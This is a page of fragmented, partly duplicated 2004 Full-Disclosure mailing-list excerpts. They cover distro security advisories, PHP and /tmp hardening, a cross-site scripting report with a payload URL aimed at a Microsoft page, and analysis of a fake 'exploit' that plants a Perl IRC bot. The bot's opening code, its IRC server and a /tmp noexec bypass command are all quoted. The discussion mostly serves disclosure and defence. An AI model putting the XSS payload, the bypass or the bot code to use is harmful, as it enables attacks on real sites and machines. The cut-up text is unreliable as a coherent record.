Hmmm. Another one:
https://mocl.one.microsoft.com/cwdl/CW_Auth.asp?PartnerAction=pick&strErrorString=alert()
Vulnerability reported to the MS in September.
Published under RFPolicy.
(c)oded by [EMAIL PROTECTED]
___
Full-Disclosure - We believe in it.
> Be fair now...
>
> NOTHING is more fucked up than the US election.
Not even Microsoft?
-ouch-
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Be fair now...
NOTHING is more fucked up than the US election.
d.k
On Wed, 3 Nov 2004 23:58:46 +, n3td3v <[EMAIL PROTECTED]> wrote:
> This thread is more f**ked up than the U.S election.
>
> Thanks,
>
> n3td3v
>
>
>
> ___
> Full-Disclosure -
===
Ubuntu Security Notice USN-17-1 November 04, 2004
passwd vulnerabilities
CAN-2004-1001
===
A security issue affects the following Ubuntu releases:
Ubuntu 4.10 (Warty Warth
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandrakelinux Security Update Advisory
___
Package name: libxml/libxml2
Advisor
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandrakelinux Security Update Advisory
___
Package name: iptables
Advisory ID:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandrakelinux Security Update Advisory
___
Package name: shadow-utils
Advisory
I'm assuming you're talking about PHP with Apache; if so, use php_admin_value
open_basedir. I would also use the php-exec-dir patch to block all executables
so they can't jump outside to other dirs with normal binaries.
- Original Message -
From: "J b" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Dave King wrote:
> There have been several sites that have announced a new phishing
> attack that's been found in Brazil that rewrites the hosts file so
> that when certain bank urls are entered they get directed to the site
> in the hosts file rather than look it up on their DNS server
Let me kn
On Thu, Nov 04, 2004 at 09:22:24PM +0100, Matthias Geerdsen wrote:
> Severity: Low
> Title: shadow: Unauthorized modification of account information
[...]
> A flaw in the chfn and chsh utilities might allow modification of
> account properties by unauthorized users.
[...]
> A local attacker
> However, when browsing the web, I found an article
> which said that "it requires an expert to lockdown
> php" (Sorry, but I can't quite recall the URL).
>
> While I am not a novice, I am definitely not an
> expert either - especially on security issues.
>
> So, I'd like to ask the members of th
s you need it (as it's a good idea to
disable anything you don't use).
Here are links to several stories about this new phishing scan.
http://story.news.yahoo.com/news?tmpl=story&cid=74&e=4&u=/cmp/20041104/tc_cmp/51202564
http://story.news.yahoo.com/news?tmpl=story&cid=75&
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Symantec LiveUpdate issues may cause DoS
Classification:
===
Level: [LOW]-med-high-crit
ID: HEXVIEW*2004*11*04*1
URL: http://www.hexview.com/docs/20041104-1.txt
Overview:
=
Symantec LiveUpdate is an application designed to
t's a good idea to
> disable anything you don't use).
>
> Here are links to several stories about this new phishing scan.
>
> http://story.news.yahoo.com/news?tmpl=story&cid=74&e=4&u=/cmp/20041104/tc_cmp/51202564
>
>
> http://story.news.yahoo.com/news?
On Thu, 04 Nov 2004 14:27:30 CST, "Brent J. Nordquist" said:
> $ /lib/ld-linux.so.2 /tmp/anexe
This one is actually nailed down in the Linux 2.6 kernel.
On Thu, 04 Nov 2004 18:09:48 -0200, Rodrigo Barbosa said:
> I'm not sure which standard (FHS ? LSB ?), but these softwares should
> honor the TMPDIR environment. And yes, /tmp is the fallback, in case
> $TMPDIR is not set.
OpenOffice apparently does now, after I filed a bug about it. I've not
ch
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandrakelinux Security Update Advisory
___
Package name: xorg-x11
Advisory ID:
s you need it (as it's a good idea to
disable anything you don't use).
Here are links to several stories about this new phishing scan.
http://story.news.yahoo.com/news?tmpl=story&cid=74&e=4&u=/cmp/20041104/tc_cmp/51202564
http://story.news.yahoo.com/news?tmpl=story&cid=
On Thu, Nov 04, 2004 at 03:33:38PM -0200, Rodrigo Barbosa wrote:
> Does anyone still have /tmp without noexec ?
>
> /dev/sda2 on /tmp type ext3 (rw,noexec,nodev,nosuid)
$ /lib/ld-linux.so.2 /tmp/anexe
(or in this case)
$ perl /tmp/hi
Those are just two off the top of my head; I've read of enough
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200411-09
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On Thu, Nov 04, 2004 at 02:24:53PM -0500, [EMAIL PROTECTED] wrote:
> 2) An amazing amount of stuff assumes that /tmp has 'exec' - at
> least for a while, 'rpmbuild' of a Redhat Perl would die because it
> build into a directory on /tmp, and then tried
[EMAIL PROTECTED] wrote:
> I think you all know, how this enables spammers to use HTTP-requests for
> CSS-files to check the validity of e-mail addresses: Instead of
> embedding an image with an identification code assigned to the
> recipient's e-mail address in the address or as a parameter to th
Yeh it was posted to neworder, security-forums.com, exploitwatch and a
few other places too.
The IRC server used to control the bots has been taken down now, so it's
no longer much of a threat even for those stupid enough to run it
On Thu, 2004-11-04 at 18:32 +, Jerome ATHIAS wrote:
> It seems
On Thu, 04 Nov 2004 15:33:38 -0200, Rodrigo Barbosa said:
> Does anyone still have /tmp without noexec ?
>
> /dev/sda2 on /tmp type ext3 (rw,noexec,nodev,nosuid)
1) A lot of people have a "one partition for everything" configuration,
as that's what their distro did at the time they first install
On Thu, 04 Nov 2004 11:07:47 EST, Michael Riedel said:
> Ok so I was dumb enough to run it. Anyone else catch what commands they
> run/ know of a way to track. I really don't feel like re-compiling gentoo.
Multiple people have posted what Perl code gets executed.
The problem is this:
$_ = `$
Um... Yeah... that's gonna stop him. It takes all of about 2 minutes to
set up a new email address and resend.
Also who said the message was not spoofed?
-KF
raza wrote:
So have we identified the sender of the list and banned him from the
Mailing List.?
Raza
-Original Message-
From: [EMAIL
It seems that it was first posted here:
http://neworder.box.sk/forum.php?did=multSecurity%20and%20Networking&thread=206439
> From: "raza" <[EMAIL PROTECTED]>
> To: "'Vincent Archer'" <[EMAIL PROTECTED]>, "'Ferdinand Klinzer'" <[EMAIL PROTECTED]>
> Subject: RE: [Full-Disclosure] New REmote Wi
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Yo Ron!
On Thu, 4 Nov 2004, Ron DuFresne wrote:
> I'm not sure php is all that safe for public consumption as you sir. A
> quick look at security focus, searching the vuln db for PHP, nothing more
> comes up with this history;
You neglected to incl
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Does anyone still have /tmp without noexec ?
/dev/sda2 on /tmp type ext3 (rw,noexec,nodev,nosuid)
On Wed, Nov 03, 2004 at 10:58:54PM -0500, Brendan Dolan-Gavitt wrote:
> Here's a rather tidier version of the perl it drops in /tmp/hi,
> courtesy of Pe
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 584-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
November 4th, 2004
Ok so I was dumb enough to run it. Anyone else catch what commands they
run/ know of a way to track. I really don't feel like re-compiling gentoo.
-mike
Vincent Archer wrote:
On Thu, Nov 04, 2004 at 02:32:33PM +0100, Ferdinand Klinzer wrote:
It's a simple perl script...
and I don't think you
So have we identified the sender of the list and banned him from the
Mailing List.?
Raza
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Vincent
Archer
Sent: 04 November 2004 14:31
To: Ferdinand Klinzer
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure]
> The "exploit" is supposed to try to open a cmd tool on 31337 (eleet) on
> a target Windows. It fails; the window system is secure... but meanwhile,
> there's a perl IRC bot running in the background of *your* system.
From what I saw of the code yesterday a connection to the windows box
was not
Cross Site Scripting In Microsoft.com
*
Introduction
It is possible to inject code that executes arbitrary scripts when a user
clicks on a link
within Microsoft's update site page. A proof of concept can be found below.
Technical Details
-
Dear [EMAIL PROTECTED],
It looks like The Bat! uses libpng 1.0.5 and zlib 1.1.3 and is
vulnerable to very old buffer overflow and double free bugs. At least
it catches exception on http://www.security.nnov.ru/files/libpngbo.png
and thread is silently closed... There is no any v
On Thu, Nov 04, 2004 at 02:32:33PM +0100, Ferdinand Klinzer wrote:
> It's a simple perl script...
>
> and I don't think you can call it a remote exploit?
It's more subtle than you think.
The "exploit" is supposed to try to open a cmd tool on 31337 (eleet) on
a target Windows. It fails; the wind
While your statement is entirely true, I believe what Daniel is
trying to point out is the fact that NAV's script blocking feature
(which is supposed to stop ALL attacks, known or not, if they involve
scripting) isn't working.
If you don't password protect your AV settings, a simple batch file
c
DanB UK wrote:
Anyone compiled and tested this yet ?
Cor blimy! I really hope you are joking.
Have you ever used perl before?
It's an interpreted language!
And this code looks like it connects to an irc server(ir3ip.net) joins
a channel(#0x) then messages the user k.
Might have messed that sligh
Yes that's right
On 04.11.2004 at 15:31, Vincent Archer wrote:
to
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Bernhard Kuemel wrote:
> Hi full-disclosure!
>
> ntpd 1:4.2.0a-11 (as in debian testing/sarge and unstable/sid) segfaults
> when accessing ntp servers on IPv6 hosts. I don't know whether this bug
you forgot to Cc: [EMAIL PROTECTED] who is the maint
Dear Daniel Milisic,
Antiviral protection is signature based. Any new virus can do anything
with antiviral program, and there is no currently protection against it.
It's by design.
--Thursday, November 4, 2004, 4:09:02 AM, you wrote to [EMAIL PROTECTED]:
DM> Hi All,
DM> I have major issues wi
It's a simple perl script...
and I don't think you can call it a remote exploit?
greets
Ferdinand aka. Bart
On 04.11.2004 at 11:40, DanB UK wrote:
Anyone compiled and tested this yet ?
Cor blimy! I really hope you are joking.
Have you ever used perl before?
It's an interpreted language!
And this
It was much easier to do:
$ gcc exploit.c
$ strings a.out
/lib/ld-linux.so.2
libc.so.6
memcpy
perror
chmod
fprintf
fseek
strncpy
sscanf
memset
fclose
exit
fopen
atoi
_IO_stdin_used
__libc_start_main
__gmon_start__
GLIBC_2.1
GLIBC_2.0
PTRh
#!/usr/bin/perl
$chan="#0x";$nick="k";$server="ir3ip.ne
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] Behalf Of Tiziano
> Radice
> Sent: 03 November 2004 09:08
> To: [EMAIL PROTECTED]
> Subject: [Full-Disclosure] Security (for the common people) in
> electronic vote?
>
>
>
>
> -Original Message-
> Surp
Nice try Ron,
while PHP indeed had lots of advisories in the past, your
list is FUD.
Many of the listed vulnerabilities are within non standard
or even EXPERIMENTAL extensions, are theoretical vulnerabilities,
are only exploitable if precondition a,b,c,d,e,f,g is fulfilled
or are only affecting
[EMAIL PROTECTED] wrote:
How dangerous is this? What about possible CSS-exploits?
Not that, but it works at Outlook Express 6.00.2900.2180
(xpsp_sp2_rtm.040803-2158) too. It loads CSS-Files from an external
server...
Greetings,
Martin Thielecke
___
Ful
> Anyone compiled and tested this yet ?
Cor blimy! I really hope you are joking.
Have you ever used perl before?
It's an interpreted language!
And this code looks like it connects to an irc server(ir3ip.net) joins
a channel(#0x) then messages the user k.
Might have messed that slightly only lo
47 matches